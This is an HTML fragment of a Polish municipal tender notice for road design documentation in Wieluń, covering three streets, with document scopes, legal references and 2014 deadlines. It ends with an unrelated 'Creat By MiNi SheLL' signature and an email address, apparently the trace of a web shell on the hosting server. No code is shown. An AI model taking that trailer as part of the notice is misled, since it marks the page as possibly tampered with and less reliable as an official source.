3) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.;
4) wykonanie kosztorysu inwestorskiego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.;
5) uzyskanie ostatecznego dokumentu upoważniającego do rozpoczęcia robót budowlanych oraz wszelkich decyzji i uzgodnień niezbędnych do jego uzyskania;
Całość dokumentacji projektowej jw. należy sporządzić również w wersji elektronicznej (PDF) i przekazać Zamawiającemu na nośniku (CD).
Wykonawca na etapie projektowania będzie zobowiązany dokonywać uzgodnień przyjętych rozwiązań projektowych z Zamawiającym. Wykonawca przedłoży wykonaną dokumentację projektową Zamawiającemu, który ustosunkuje się do niej w ciągu 21 dni od jej dostarczenia.  Aprobata Zamawiającego przedłożonej przez Wykonawcę dokumentacji nie zwalnia Wykonawcy z odpowiedzialności za prawidłowość opracowania dokumentacji projektowej i wykonania na jej podstawie robót budowlanych. 
Za wykonanie zamówienia uważa się przekazanie Zamawiającemu kompletnej dokumentacji projektowej oraz ostatecznego dokumentu uprawniającego Zamawiającego do rozpoczęcia robót budowlanych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Remont chodnika Wieluń, ul. Biedala - Zadanie Nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Branża drogowa (długość około 145 m). Zakres rzeczowy dokumentacji projektowej winien obejmować:
1) pozyskanie matrycy geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówienia w skali 1:500 w formie numerycznej zgodnie z rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25, poz. 133), wykonanie analogowo na folii i zapisanie na nośniku CD w formacie DXF. Matryca po wykonaniu zamówienia staje się własnością Zamawiającego;
2) wykonanie kompletnej dokumentacji projektowej uwzględniającej obowiązującej normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, opracowanych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi, szczególnie rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2012 r., poz. 462) obejmującej:
- projekt budowlany - w ilości 5 egz.
- projekt wykonawczy - w ilości 5 egz.
- przedmiar robót - w ilości 2 egz.
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) - w ilości 2 egz.
3) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.;
4) wykonanie kosztorysu inwestorskiego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.;
5) uzyskanie ostatecznego dokumentu upoważniającego do rozpoczęcia robót budowlanych oraz wszelkich decyzji i uzgodnień niezbędnych do jego uzyskania;
Całość dokumentacji projektowej jw. należy sporządzić również w wersji elektronicznej (PDF) i przekazać Zamawiającemu na nośniku (CD).
Wykonawca na etapie projektowania będzie zobowiązany dokonywać uzgodnień przyjętych rozwiązań projektowych z Zamawiającym. Wykonawca przedłoży wykonaną dokumentację projektową Zamawiającemu, który ustosunkuje się do niej w ciągu 21 dni od jej dostarczenia.  Aprobata Zamawiającego przedłożonej przez Wykonawcę dokumentacji nie zwalnia Wykonawcy z odpowiedzialności za prawidłowość opracowania dokumentacji projektowej i wykonania na jej podstawie robót budowlanych. 
Za wykonanie zamówienia uważa się przekazanie Zamawiającemu kompletnej dokumentacji projektowej oraz ostatecznego dokumentu uprawniającego Zamawiającego do rozpoczęcia robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont ul. Ewangelickiej w Wieluniu - Zadanie Nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Branża drogowa (długość około 220 m).
Zakres rzeczowy dokumentacji projektowej winien obejmować:
1) pozyskanie matrycy geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówienia w skali 1:500 w formie numerycznej zgodnie z rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25, poz. 133), wykonanie analogowo na folii i zapisanie na nośniku CD w formacie DXF. Matryca po wykonaniu zamówienia staje się własnością Zamawiającego;
2) wykonanie kompletnej dokumentacji projektowej uwzględniającej obowiązującej normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, opracowanych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi, szczególnie rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2012 r., poz. 462) obejmującej:
- projekt budowlany - w ilości 5 egz.
- projekt wykonawczy - w ilości 5 egz.
- przedmiar robót - w ilości 2 egz.
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) - w ilości 2 egz.
3) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.;
4) wykonanie kosztorysu inwestorskiego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.;
5) uzyskanie ostatecznego dokumentu upoważniającego do rozpoczęcia robót budowlanych oraz wszelkich decyzji i uzgodnień niezbędnych do jego uzyskania;
Całość dokumentacji projektowej jw. należy sporządzić również w wersji elektronicznej (PDF) i przekazać Zamawiającemu na nośniku (CD).
Wykonawca na etapie projektowania będzie zobowiązany dokonywać uzgodnień przyjętych rozwiązań projektowych z Zamawiającym. Wykonawca przedłoży wykonaną dokumentację projektową Zamawiającemu, który ustosunkuje się do niej w ciągu 21 dni od jej dostarczenia.  Aprobata Zamawiającego przedłożonej przez Wykonawcę dokumentacji nie zwalnia Wykonawcy z odpowiedzialności za prawidłowość opracowania dokumentacji projektowej i wykonania na jej podstawie robót budowlanych. 
Za wykonanie zamówienia uważa się przekazanie Zamawiającemu kompletnej dokumentacji projektowej oraz ostatecznego dokumentu uprawniającego Zamawiającego do rozpoczęcia robót budowlanych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont ul. Fabrycznej - budowa ul. Fabrycznej w Wieluniu - Zadanie Nr 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Branża drogowa: remont (długość około 400 m), budowa (długość około 350 m); kanalizacja deszczowa , (długość około 350 m); oświetlenie uliczne (długość około 350 m). Dla zadania nr 4 należy przewidzieć przeprowadzenie procedury w oparciu o ustawę o Szczególnych zasadach przygotowania i realizacji w zakresie dróg publicznych. Dla zadania nr 4 została ogłoszona informacja o możliwości umieszczenia w pasie drogowym kanału technologicznego, w związku z czym przy realizacji zadań może zajść konieczność zaprojektowania umieszczenia w pasie drogowym urządzeń, o których mowa w art. 39 ust. 6 ustawy o drogach publicznych
Zakres rzeczowy każdej z wyżej wymienionych dokumentacji projektowych winien obejmować:
1) pozyskanie matrycy geodezyjnej do celów projektowych w zakresie niezbędnym do realizacji zamówienia w skali 1:500 w formie numerycznej zgodnie z rozporządzeniem Ministra Gospodarki Przestrzennej i Budownictwa z dnia 21 lutego 1995 r. w sprawie rodzaju i zakresu opracowań geodezyjno-kartograficznych oraz czynności geodezyjnych obowiązujących w budownictwie (Dz. U. Nr 25, poz. 133), wykonanie analogowo na folii i zapisanie na nośniku CD w formacie DXF. Matryca po wykonaniu zamówienia staje się własnością Zamawiającego;
2) wykonanie kompletnej dokumentacji projektowej uwzględniającej obowiązującej normy i przepisy wraz z niezbędnymi uzgodnieniami umożliwiającymi uzyskanie pozwolenia na budowę, opracowanych zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo Budowlane (Dz. U. z 2013 r. poz. 1409 z późn. zm.) i przepisami wykonawczymi, szczególnie rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie szczegółowego zakresu i formy projektu budowlanego ( Dz. U. z 2012 r., poz. 462) obejmującej:
- projekt budowlany - w ilości 5 egz.
- projekt wykonawczy - w ilości 5 egz.
- przedmiar robót - w ilości 2 egz.
- informację dotyczącą bezpieczeństwa i ochrony zdrowia (BIOZ) - w ilości 2 egz.
3) wykonanie specyfikacji technicznej wykonania i odbioru robót budowlanych, przez którą należy rozumieć opracowania zawierające w szczególności zbiory wymagań, które są niezbędne do określenia standardu i jakości wykonania robót, w zakresie sposobu wykonania robót budowlanych, właściwości wyrobów budowlanych oraz oceny prawidłowości wykonania poszczególnych robót. Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych i wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (Dz. U. Nr 202, poz. 2072 z późniejszymi zmianami) - w ilości 2 egz.;
4) wykonanie kosztorysu inwestorskiego zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 18.05.2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. Nr 130, poz. 1389) wydrukowanych w opcji kalkulacji uproszczonej z wyszczególnieniem cen jednostkowych dla każdej pozycji kosztorysowej - w ilości 2 egz.;
5) uzyskanie ostatecznego dokumentu upoważniającego do rozpoczęcia robót budowlanych oraz wszelkich decyzji i uzgodnień niezbędnych do jego uzyskania;
Całość dokumentacji projektowej jw. należy sporządzić również w wersji elektronicznej (PDF) i przekazać Zamawiającemu na nośniku (CD).
Wykonawca na etapie projektowania będzie zobowiązany dokonywać uzgodnień przyjętych rozwiązań projektowych z Zamawiającym. Wykonawca przedłoży wykonaną dokumentację projektową Zamawiającemu, który ustosunkuje się do niej w ciągu 21 dni od jej dostarczenia.  Aprobata Zamawiającego przedłożonej przez Wykonawcę dokumentacji nie zwalnia Wykonawcy z odpowiedzialności za prawidłowość opracowania dokumentacji projektowej i wykonania na jej podstawie robót budowlanych. 
Za wykonanie zamówienia uważa się przekazanie Zamawiającemu kompletnej dokumentacji projektowej oraz ostatecznego dokumentu uprawniającego Zamawiającego do rozpoczęcia robót budowlanych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.32.00.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 01.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com